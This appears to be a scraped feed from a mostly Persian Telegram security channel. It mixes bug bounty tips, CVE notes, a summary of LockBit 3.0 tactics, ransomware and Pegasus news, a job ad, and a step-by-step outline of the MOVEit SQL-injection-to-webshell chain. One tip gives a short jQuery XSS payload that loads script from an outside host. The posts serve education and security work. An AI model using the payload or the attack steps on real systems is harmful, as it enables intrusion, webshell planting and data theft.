Network Security Channel
2.56K subscribers
5.33K photos
3.42K videos
5.56K files
4.44K links
شروع از سال 1395
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
Bug Bounty Hint

Is your JS payload limited to only 44 symbols?

Check if the website uses jQuery. This could help you execute your external JS, increasing your impact by providing an extended PoC.

$('<script src=//dom.xss>').appendTo('body')


@Engineer_Computer
CVE-2023-23924: Dompdf up to 2.0.1 on PHP7 SVG Parser deserialization restoring in RCE.
To exploit CVE-2023-23924. An SVG contacting image tag with capitalized letters is sufficient.

@Engineer_Computer
Bug Bounty Tip

Don't forget to search for traits of 'post message' event handlers in all JS sources by using the built-in search functionality in your browser.

Search:
window.addEventListener("message"

Inspect those events for potential XSS

@Engineer_Computer
Drone Security and Fault _ IOactive.pdf
1.6 MB
🔴 Drone Security and Fault Injection Attacks

🔴 هک پهپاد با تکنیک EMFI

محققای IOActive ، یه تحقیقی روی پهپادها انجام دادن و متوجه شدن که اغلبشون پتاسیل هک در برابر حملات EMFI رو دارن.

https://act-on.ioactive.com/acton/attachment/34793/f-b1aa96d0-bd78-4518-bae3-2889aae340de/1/-/-/-/-/DroneSec-GGonzalez.pdf

https://www.securityweek.com/new-research-shows-potential-of-electromagnetic-fault-injection-attacks-against-drones/

@Engineer_Computer
امنیت اطلاعات در برابر فناوری اطلاعات
#اینفوگرافیک
👍1
#Forrester Wave :
Enterprise Email Security
Q2 2023
#Report
@Engineer_Computer
مقایسه XDR و SOAR و SIEM
#اینفوگرافیک
#استخدام
بانک تجارت و شرکت‌های تابعه‌ش تو زمینه های زیر با سطح تخصص کارشناس / مدیر پروژه نیرو میگیره:
1. NOC/ پایش
2. SOC / CSIRT

علاقمندان رزومه‌‌شون رو به ایمیل زیر ارسال کنند:
[email protected]

@Engineer_Computer
#Ransomware #LockBit 3.0
باج افزار LockBit تا کنون مبلغی بیش از 100 میلیون دلار توانسته باج گیری رایانه ای کنه که عموما از ارگان های دولتی آمریکا، چین، هند، فرانسه، آلمان، اوکراین و اندونزی رو درگیر کرده و جالب است که با سرور هایی که زبان های روسی، رومانی، عربی سوری تنظیم داشتند، کاری نداشته است.

اما رفتار های شاخص تکنیکی تاکتیکی این باج افزار چی مواردی است؟ نسخه 3 این باج افزار برای ایجاد دسترسی از تکنیک های  Bruteforce پروتکل RDP ، تکنیک Drive-By Compromise و Spear Phishing و دسترسی به حساب های کاربری صحیح و همچنین بهره برداری از یک آسیب پذیری سرویس های fortinet بوده است.

اما برای Exfiltration عموما از وبسرویس های اشتراک گذاری فایل استفاده شده که فایل های مورد نیاز باج افزار رو به سیستم قربانی انتقال خواهد داد.

استفاده از Autostart Execution ها برای ارتقاء سطح دسترسی که معمولا با schtasks انجام میشه، استفاده از Obfuscation کد برای نامحسوس سازی PE باج افزار، خاموش کردن سرویس های امنیتی سیستم عامل، گرفتن Dump از LSASS بر بستر حافظه و مواردی دیگر، اطلاعات تکمیلی در این مقاله است.

@Engineer_Computer
WSTG.pdf
17.3 MB
کتاب فارسی WSTG
استاندارد جامعی که اغلب در فرآیند تست نفوذ وب مورد استفاده قرار می گیرد، استاندارد WSTG یا Web Security Testing Guide است.
نویسنده : مهندس نیک آور
@Engineer_Computer
👍1
Media is too big
VIEW IN TELEGRAM
⭕️ مستند تحقیقی الجزیره: عملیات "هک بزرگ" زیرو کلیک

اولین بار برنامه جاسوسی اسرائیل «پگاسوس» در سال ۲۰۱۶ برای نفوذ به تلفن «احمد منصور» فعال اماراتی استفاده شد و در نتیجه این عملیات احمد منصور تا به امروز در زندان به سر می‌برد.

«بیل مارزال» کارشناس آزمایشگاه «سیتزن لاب» در خصوص چگونگی هک شدن منصور می‌گوید که این فعال اماراتی پیام‌های کوتاهی از شماره‌های ناشناس دریافت می‌کرد که به آنها مشکوک بود که این پیام‌ها برای نصب نرم‌افزار جاسوسی بر روی تلفن همراه وی ارسال می‌شد.

«کوبر کوینتون» کارشناس امنیت سایبری اعلام کرد که گوشی‌های کارمندان شبکه الجزیره بین ماه‌های جولای و آگوست به سرورهایی متصل است که توسط «ان اس او» یک شرکت فناوری در اسرائیل برای تحویل نرم افزارهای جاسوسی #پگاسوس استفاده می‌شود.

@Engineer_Computer
CyberSecurity Interview Tips.pdf
2.8 MB
Cyber Security #Interview Tips

How to stand out, get hired and advance your career.
@Engineer_Computer
👍1
Media is too big
VIEW IN TELEGRAM
#MOVEit #Transfer #SQLi
اخیرا دو آسیب پذیری ثبت شده با شناسه های CVE-2023-34362 و CVE-2023-35036 که از نوع Unauthenticated SQLi بوده است که به شرح زیر میباشد:

اول: پیدا کردن CSRF Token، دریافت Cookie از نقطه انتهایی guestaccess.aspx، تنظیم session قرار دادن پیلود SQL در پارامتر MyPkgSelfProvisionedRecips هدر Cookie، ساخت رمز با Salt منطبق با پایگاه داده.

دوم: ایجاد کاربر sysadmin در پایگاه داده و تنظیم رمز از قبل طراحی شده و اعطا دسترسی پایگاه داده.

سوم: گرفتن API Token از Endpoint مربوطه.

چهارم: پیدا کردن ID پوشه هدف بارگزاری ها.

پنجم: آپلود فایل Webshell بواسطه دسترسی به .API

هفتم: فاش کردن کلید رمزنگاری بخش Standard Networks\siLock\Institutions برای ارتباط یکی از پارامتر های API

هشتم: ایجاد یک Deserialization Gadget که دارای پبلود ایجاد یک Process بر روی سیستم عامل است.

نهم: این Gadget در پایگاه داده و فایل آپلودی در فیلد file_jason بروز رسانی میشه.

دهم: ارتباط با فایل از طریق API گرفته میشه و Gadget قرار داده شده در فایل اجرا میشه.

یازدهم: نشانه های IoC از روی پایگاه داده حذف میشود.
🔥1